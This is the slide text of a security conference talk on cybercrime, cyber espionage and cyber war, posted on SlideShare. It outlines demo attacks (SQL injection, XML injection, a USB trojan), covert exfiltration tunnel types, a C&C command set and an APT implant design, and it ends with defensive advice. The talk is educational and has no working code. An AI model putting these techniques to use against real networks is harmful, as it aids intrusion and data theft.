4 ivan buetler cyber_espionage

1,040 views

Published on

Published in: Technology, News & Politics
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
1,040
On SlideShare
0
From Embeds
0
Number of Embeds
272
Actions
Shares
0
Downloads
21
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

4 ivan buetler cyber_espionage

  1. 1. Ivan Bütler Compass Security AG, Schweiz Ivan.buetler@csnc.chCYBERFACES Compass Security AG Tel.+41 55-214 41 60 Glärnischstrasse 7 Fax+41 55-214 41 61 Postfach 1628 team@csnc.ch CH-8640 Rapperswil www.csnc.ch
  2. 2. Ethical Hacker / Penetration Tester Gründer & CEO Compass Security AG Lecturer @ University of Applied Science Rapperswil Lecturer @ University of Applied Science Lucerne Lecturer @ University of St.Gallen Speaker @ BlackHat Las Vegas 2008 SmartCard (In) Security Speaker @ IT Underground Warsaw 2009 Advanced Web Hacking Speaker @ Swiss IT Leadership Forum Nice 2009 Cyber Underground Founder of Swiss Cyber Storm Sec Conference Board member of Information Security Society Switzerland (ISSS) Board member of Cyber Tycoons Anti-Warfare Foundation© Compass Security AG www.csnc.ch Slide 2
  3. 3. Agenda Hacking 1x1 Hacking for Fun and Honor Hacking for Profit Hacking for Companies / Espionage Hacking for States / Espionage Hacking in a War Conclusion© Compass Security AG www.csnc.ch Slide 3
  4. 4. Hacking 1x1 Compass Security AG Tel.+41 55-214 41 60 Glärnischstrasse 7 Fax+41 55-214 41 61 Postfach 1628 team@csnc.ch CH-8640 Rapperswil www.csnc.ch
  5. 5. Hacking 1x1 Attack Attack Creation Exploitation Hacker Toolbox Attack Attack Improvement Maintenance© Compass Security AG www.csnc.ch Slide 5
  6. 6. Hacking Targets© Compass Security AG www.csnc.ch Slide 6
  7. 7. We are all „easy targets“Source: Symantec Internet Security Threat Report, H1, 2005 Advisory is published Patch 54 days Exploit 6 days[3] ETHZ Stefan Frei 2009 (Dissertation): We found that exploit availability consistently exceeds patch availability since 2000© Compass Security AG www.csnc.ch Slide 7
  8. 8. Human Proxy – Illusion – Social Eng.© Compass Security AG www.csnc.ch Slide 8
  9. 9. Direct AttackServer Exploitation BLOCKED PASSED BLOCKED© Compass Security AG www.csnc.ch Slide 9
  10. 10. Indirect Attack (I)Man in the Middle – Phishing© Compass Security AG www.csnc.ch Slide 10
  11. 11. Indirect Attack (II)Malware – Mobile Devices – W-LAN PASSED© Compass Security AG www.csnc.ch Slide 11
  12. 12. Drivers behind „Hacking“ Compass Security AG Tel.+41 55-214 41 60 Glärnischstrasse 7 Fax+41 55-214 41 61 Postfach 1628 team@csnc.ch CH-8640 Rapperswil www.csnc.ch
  13. 13. Motivation for„Hacking“Hacking for Fun Cyber Crime Cyber Espionage Cyber Warfare © Compass Security AG www.csnc.ch Slide 13
  14. 14. Hacking for Fun or MoralHacking not for commerce – but for fun or moral ! Compass Security AG Tel.+41 55-214 41 60 Glärnischstrasse 7 Fax+41 55-214 41 61 Postfach 1628 team@csnc.ch CH-8640 Rapperswil www.csnc.ch
  15. 15. Joy Rider – Hacking for Honor© Compass Security AG www.csnc.ch Slide 15
  16. 16. Moral Hacking© Compass Security AG www.csnc.ch Slide 16
  17. 17. Hacking for ProfitCyber Crime Compass Security AG Tel.+41 55-214 41 60 Glärnischstrasse 7 Fax+41 55-214 41 61 Postfach 1628 team@csnc.ch CH-8640 Rapperswil www.csnc.ch
  18. 18. Who is the Enemy?Hacking for Fun Cyber Crime Cyber Espionage Cyber Warfare © Compass Security AG www.csnc.ch Slide 18
  19. 19. How to make Money? Business Case of „Hackers“Hacker-Tools Hacker-Services Trading „Rent a BotNet“ Illegal Goods „Spam the World“© Compass Security AG www.csnc.ch Slide 19
  20. 20. Example: SQL InjectionApproach: Direct AttackImpact: Credit Card Disclosure Compass Security AG Tel.+41 55-214 41 60 Glärnischstrasse 7 Fax+41 55-214 41 61 Postfach 1628 team@csnc.ch CH-8640 Rapperswil www.csnc.ch
  21. 21. SQL IntroductionProtocols HTTPS RMI SQL© Compass Security AG www.csnc.ch Slide 21
  22. 22. SQL IntroductionProtocols HTTPS + SQL Hacker Code RMI SQL© Compass Security AG www.csnc.ch Slide 22
  23. 23. Demo1: SQL InjectionApproach: Direct AttackImpact: Credit Card Disclosure Compass Security AG Tel.+41 55-214 41 60 Glärnischstrasse 7 Fax+41 55-214 41 61 Postfach 1628 team@csnc.ch CH-8640 Rapperswil www.csnc.ch
  24. 24. How to make Money? (1)Market for anonymous trading is required ! Compass Security AG Tel.+41 55-214 41 60 Glärnischstrasse 7 Fax+41 55-214 41 61 Postfach 1628 team@csnc.ch CH-8640 Rapperswil www.csnc.ch
  25. 25. Show: Video 1: Cyber Market Compass Security AG Tel.+41 55-214 41 60 Glärnischstrasse 7 Fax+41 55-214 41 61 Postfach 1628 team@csnc.ch CH-8640 Rapperswil www.csnc.ch
  26. 26. Trading of illegal goods Dumps Stolen Credit Cards Carders Provider of “Dumps” Carding Using Dumps WU Western Union WMZ Web Money WU Western Union LR Liberty Reserve CVVs Card Verification Value Drops Remailing Location Rippers CVV verification service© Compass Security AG www.csnc.ch Slide 26
  27. 27. 5000 Unexpired/Valid CC Dumps $2000Money Rule: How to pay the illegal goods? Payment with Liberty Reserve © Compass Security AG www.csnc.ch Slide 27
  28. 28. Liberty Reserve?-> Internet Currency (anonymous)© Compass Security AG www.csnc.ch Slide 28
  29. 29. Liberty Reserve as E-CurrencyBoth, seller and buyer need an LR accountThe LR account is anonymous Anonym Anonym© Compass Security AG www.csnc.ch Slide 29
  30. 30. LR requires „Exchanger“Real Money is exchanged into LR currencyDirect payment into LR account is not possibleMore than 100 LR enabled banks (exchanger banks) Trust© Compass Security AG www.csnc.ch Slide 30
  31. 31. How to make Money? (2)Money Mule and Money Laundry Compass Security AG Tel.+41 55-214 41 60 Glärnischstrasse 7 Fax+41 55-214 41 61 Postfach 1628 team@csnc.ch CH-8640 Rapperswil www.csnc.ch
  32. 32. Example PostFinance (Phishing) Transaction with Money Mule© Compass Security AG www.csnc.ch Slide 32
  33. 33. MELANI says ...Response from Cyber Underground to MELANI request Reference: Marc Henauer, Leiter Melani ISSS St.Galler Tagung, 29. April 2010© Compass Security AG www.csnc.ch Slide 33
  34. 34. How to make Money? (3)Split Hacking from financial benefit Compass Security AG Tel.+41 55-214 41 60 Glärnischstrasse 7 Fax+41 55-214 41 61 Postfach 1628 team@csnc.ch CH-8640 Rapperswil www.csnc.ch
  35. 35. Splitting „Hacking“ and Financial Benefit Financial Hacking Benefit© Compass Security AG www.csnc.ch Slide 35
  36. 36. Example: XML InjectionApproach: Direct AttackImpact: Credential Disclosure Compass Security AG Tel.+41 55-214 41 60 Glärnischstrasse 7 Fax+41 55-214 41 61 Postfach 1628 team@csnc.ch CH-8640 Rapperswil www.csnc.ch
  37. 37. XML EinführungProtokoll HTTPS + XML XML Query© Compass Security AG www.csnc.ch Slide 37
  38. 38. XML InjectionProtokoll HTTPS + XML Hacker Code XML Parser Attack© Compass Security AG www.csnc.ch Slide 38
  39. 39. Demo2: XML InjectionApproach: Direct AttackImpact: Credential Disclosure Compass Security AG Tel.+41 55-214 41 60 Glärnischstrasse 7 Fax+41 55-214 41 61 Postfach 1628 team@csnc.ch CH-8640 Rapperswil www.csnc.ch
  40. 40. Cyber EspionageThey go after information ... Compass Security AG Tel.+41 55-214 41 60 Glärnischstrasse 7 Fax+41 55-214 41 61 Postfach 1628 team@csnc.ch CH-8640 Rapperswil www.csnc.ch
  41. 41. Who is the Enemy?Hacking for Fun Cyber Crime Cyber Espionage Cyber Warfare © Compass Security AG www.csnc.ch Slide 41
  42. 42. How to rule the World © Compass Security AG www.csnc.ch Slide 42
  43. 43. Example: USB TrojanApproach: Indirect AttackImpact: Advanced Persistent Threat Compass Security AG Tel.+41 55-214 41 60 Glärnischstrasse 7 Fax+41 55-214 41 61 Postfach 1628 team@csnc.ch CH-8640 Rapperswil www.csnc.ch
  44. 44. Virus Construction ToolkitCovert Channel Delivery with USB-Stick/CD-ROM Attacker controls the computer of the victim Start via Auto-Start Company Network Internet© Compass Security AG www.csnc.ch Slide 44
  45. 45. Demo3: USB TrojanerApproach: Indirect AttackImpact: Remote Control of Victim (RAT) Access to files Compass Security AG Tel.+41 55-214 41 60 Glärnischstrasse 7 Fax+41 55-214 41 61 Postfach 1628 team@csnc.ch CH-8640 Rapperswil www.csnc.ch
  46. 46. Covert Channels I - DirektSimple Inside-Out Attack Corporate LAN InternetDirect Channels ACK tunnel TCP tunnel (pop, telnet, ssh) UDP tunnel (syslog, snmp) ICMP tunnel IPSEC, PPTP© Compass Security AG www.csnc.ch Slide 46
  47. 47. Covert Channels II - ProxifiedAdvanced Inside-Out Attack LAN Proxy Corporate LAN Internet DMZ ProxyProxified Channels Socks SSL tunnel HTTP/S tunnel (payload of http = tunnel) HTTP/S proxy CONNECT method tunnel DNS tunnel FTP tunnel Mail tunnel© Compass Security AG www.csnc.ch Slide 47
  48. 48. Advanced Persistent Threat Compass Security AG Tel.+41 55-214 41 60 Glärnischstrasse 7 Fax+41 55-214 41 61 Postfach 1628 team@csnc.ch CH-8640 Rapperswil www.csnc.ch
  49. 49. Advanced Persistent Threat Agent Zombie Host Zombie Host Agent C&C ServerAgent Zombie Host Zombie Host © Compass Security AG www.csnc.ch Slide 49
  50. 50. Advanced Persistent ThreatCommand & Control Communication Client DNS Server POLL POLL POLL Command File CommandsCommands Execute commands1. POLL2. GET FILE TO CLIENT3. PUT FILE TO SERVER4. EXECUTE @ CLIENT5. EXIT CLIENT© Compass Security AG www.csnc.ch Slide 50
  51. 51. APT Design PatternFirst Infection Installation of a user-land virus or Trojan horse The virus does not require local admin privileges The virus talks back to the command & control server (C&C) Get latest updates from C&C – very important! If C&C is unreachable – self-destroy routinePrivilege Elevation Elevate privileges with 0-day exploit Keyboard Sniffer Create encrypted storage Evidence protection Get latest updates Send collected information - important If C&C is unreachable – sleep for 90 days© Compass Security AG www.csnc.ch Slide 51
  52. 52. What to do if we find out we arecompromized?How to handle long-term attacks Compass Security AG Tel.+41 55-214 41 60 Glärnischstrasse 7 Fax+41 55-214 41 61 Postfach 1628 team@csnc.ch CH-8640 Rapperswil www.csnc.ch
  53. 53. Advanced Persistent Threat Incident Handling – C&C Traffic Redirection Agent Zombie Host Zombie Host Agent Redirect C&C Server Update ServiceAgent Zombie Host Zombie HostProblems!!! Updates are Anti-APTEncrypted / Signed ZombieReverse Engineering required or C&C Host © Compass Security AG www.csnc.ch Slide 53
  54. 54. US ReportNov. 2008China has an active cyber espionage program. Since China’s current cyber operations capability is so advanced, it can engage in forms of cyber warfare so sophisticated that the United States may be unable to counteract or even detect the efforts. By some estimates, there are 250 hacker groups in China that are tolerated and may even be encouraged by the government to enter and disrupt computer networks© Compass Security AG www.csnc.ch Slide 54
  55. 55. Cyber WarCyber is a new military domain of operations Compass Security AG Tel.+41 55-214 41 60 Glärnischstrasse 7 Fax+41 55-214 41 61 Postfach 1628 team@csnc.ch CH-8640 Rapperswil www.csnc.ch
  56. 56. USA: Cyber CommandOn June 23, 2009, the Secretary of Defense directed the Commander of U.S. Strategic Command to establish USCYBERCOM. Director of NSA and Commander of Cybercom http://www.defense.gov/cyber© Compass Security AG www.csnc.ch Slide 56
  57. 57. USA: New Domain of Operations - CyberLandSeaAirSpaceCyberC⁴ISR (command and control, communications, computers, intelligence, surveillance, and reconnaissance)© Compass Security AG www.csnc.ch Slide 57
  58. 58. War Assets Critical Infrastructures Compass Security AG Tel.+41 55-214 41 60 Glärnischstrasse 7 Fax+41 55-214 41 61 Postfach 1628 team@csnc.ch CH-8640 Rapperswil www.csnc.ch
  59. 59. Schweizhttp://www.bevoelkerungsschutz.admin.ch/internet/bs/de/home/themen/ski/kritische_infrastrukturen.html © Compass Security AG www.csnc.ch Slide 59
  60. 60. 1) Cyber Attack: Government© Compass Security AG www.csnc.ch Slide 60
  61. 61. 2) Cyber Attack: Power and Energy© Compass Security AG www.csnc.ch Slide 61
  62. 62. 3) Cyber Attack: Trash Recycling© Compass Security AG www.csnc.ch Slide 62
  63. 63. 4) Cyber Attack: Finance© Compass Security AG www.csnc.ch Slide 63
  64. 64. 5) Cyber Attack: Health© Compass Security AG www.csnc.ch Slide 64
  65. 65. 7) Cyber Attack: IT & Telekommunikation© Compass Security AG www.csnc.ch Slide 65
  66. 66. 8) Cyber Attack: Nahrung© Compass Security AG www.csnc.ch Slide 66
  67. 67. 9) Cyber Attack: Public Security© Compass Security AG www.csnc.ch Slide 67
  68. 68. 10) Cyber Attack: Traffic & Transport© Compass Security AG www.csnc.ch Slide 68
  69. 69. Cyber Defense in Switzerland? Compass Security AG Tel.+41 55-214 41 60 Glärnischstrasse 7 Fax+41 55-214 41 61 Postfach 1628 team@csnc.ch CH-8640 Rapperswil www.csnc.ch
  70. 70. Divisionär Kurt Nydegger Er hat den Auftrag, eine Auslegeordnung zu machen und dem Bundesrat eine Verteidigungsstrategie vorzulegen. Die Aufgabe ist komplex, denn das Bedrohungsbild ist diffus.© Compass Security AG www.csnc.ch Slide 70
  71. 71. Conclusion & Recommendations Compass Security AG Tel.+41 55-214 41 60 Glärnischstrasse 7 Fax+41 55-214 41 61 Postfach 1628 team@csnc.ch CH-8640 Rapperswil www.csnc.ch
  72. 72. Recommendations Setup Basic Security (against Script Kiddies) Identify critical assets which are essential for your business and secure them very strict, even make them secure against internal users (their computers could be compromized) Test your security – Penetration Tests Monitor your infrastructure day and night Prepare yourself for an APT incident case. Think about how you would monitor your perimeter network traffic, how to reverse- engineer encrypted C&C traffic. How to communicate with your employers, media, stakeholders, shareholders, management.© Compass Security AG www.csnc.ch Slide 72
  73. 73. Discussion/Questions Questions?!© Compass Security AG www.csnc.ch Slide 73
  74. 74. Thank You – Ivan BütlerCompass Security AGWerkstrasse 20P.O. Box 2037CH - 8645 Jona SGSwitzerlandTel. +41 55 214 41 60Fax +41 55 214 41 61team@csnc.chwww.csnc.chivan.buetler@csnc.ch© Compass Security AG www.csnc.ch Slide 74

×